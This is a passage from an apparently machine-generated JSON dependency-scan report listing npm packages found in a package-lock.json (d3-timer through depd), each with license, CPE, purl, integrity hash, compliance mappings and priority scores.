"sha512-dJxPBlzC7NugB2PDLwo9Q8JiTR3M3e4/XANkreKSUxF8vvXKqm1Yfq4Q5dl8budlunRVlUUaDUgFt7eA8D6NLg==", "dependencies": { "d3-time": "1 - 3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "014411da08f2c5cc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-timer 3.0.1", "title": "d3-timer 3.0.1", "description": "Package discovered: d3-timer 3.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1f58b04c062182d6", "name": "d3-timer", "version": "3.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-timer:d3-timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-timer:d3_timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_timer:d3-timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_timer:d3_timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_timer:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-timer@3.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-timer/-/d3-timer-3.0.1.tgz", "integrity": "sha512-ndfJ/JxxMd3nw31uyKoY2naivF+r29V+Lc0svZxe1JvvIRmi8hUsrMvdOwgS1o6uBHmiz91geQ0ylPP0aj1VUA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8491d2589d2b26fe", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dayjs 1.11.20", "title": "dayjs 1.11.20", "description": "Package discovered: dayjs 1.11.20", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "11ebb955a4940d8a", "name": "dayjs", "version": "1.11.20", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dayjs:dayjs:1.11.20:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dayjs@1.11.20", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.20.tgz", "integrity": "sha512-YbwwqR/uYpeoP4pu043q+LTDLFBLApUP6VxRihdfNTqu4ubqMlGDLd6ErXhEgsyvY0K6nCs7nggYumAN+9uEuQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3e4836eb16baaf2c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: debug 2.6.9", "title": "debug 2.6.9", "description": "Package discovered: debug 2.6.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "791d0c8d38a3b042", "name": "debug", "version": "2.6.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:debug_project:debug:2.6.9:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/debug@2.6.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", "dependencies": { "ms": "2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c3870af17f8e7246", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: debug 4.4.3", "title": "debug 4.4.3", "description": "Package discovered: debug 4.4.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "96b0606cb5228062", "name": "debug", "version": "4.4.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:debug_project:debug:4.4.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/debug@4.4.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", "dependencies": { "ms": "^2.1.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6cb9876ddd023a8b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: decamelize 1.2.0", "title": "decamelize 1.2.0", "description": "Package discovered: decamelize 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "56044f762e36d59b", "name": "decamelize", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:decamelize:decamelize:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/decamelize@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-1.2.0.tgz", "integrity": "sha512-z2S+W9X73hAUUki+N+9Za2lBlun89zigOyGrsax+KUQ6wKW4ZoWpEYBkGhQjwAjjDCkWxhY0VKEhk8wzY7F5cA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2d9026954da43a27", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: decimal.js-light 2.5.1", "title": "decimal.js-light 2.5.1", "description": "Package discovered: decimal.js-light 2.5.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6135efdaaf1822bb", "name": "decimal.js-light", "version": "2.5.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:decimal.js-light:decimal.js-light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:decimal.js-light:decimal.js_light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:decimal.js_light:decimal.js-light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:decimal.js_light:decimal.js_light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:decimal.js:decimal.js-light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:decimal.js:decimal.js_light:2.5.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/decimal.js-light@2.5.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/decimal.js-light/-/decimal.js-light-2.5.1.tgz", "integrity": "sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8e421fc3fe27aa9c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: deepmerge 4.3.1", "title": "deepmerge 4.3.1", "description": "Package discovered: deepmerge 4.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6fcde9d497e83e33", "name": "deepmerge", "version": "4.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:deepmerge:deepmerge:4.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/deepmerge@4.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bd6d6c864c2f97b9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: delayed-stream 1.0.0", "title": "delayed-stream 1.0.0", "description": "Package discovered: delayed-stream 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c23340a58ec36159", "name": "delayed-stream", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:delayed-stream:delayed-stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:delayed-stream:delayed_stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:delayed_stream:delayed-stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:delayed_stream:delayed_stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:delayed:delayed-stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:delayed:delayed_stream:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/delayed-stream@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b4af690e8812705b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: denque 2.1.0", "title": "denque 2.1.0", "description": "Package discovered: denque 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b292c74570fb7df3", "name": "denque", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:denque:denque:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/denque@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/denque/-/denque-2.1.0.tgz", "integrity": "sha512-HVQE3AAb/pxF8fQAoiqpvg9i3evqug3hoiwakOyZAwJm+6vZehbkYXZ0l4JxS+I3QxM97v5aaRNhj8v5oBhekw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "86dec3bfd9bed666", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: depd 2.0.0", "title": "depd 2.0.0", "description": "Package discovered: depd 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "82a407fce3facea3", "name": "depd", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:depd:depd:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], 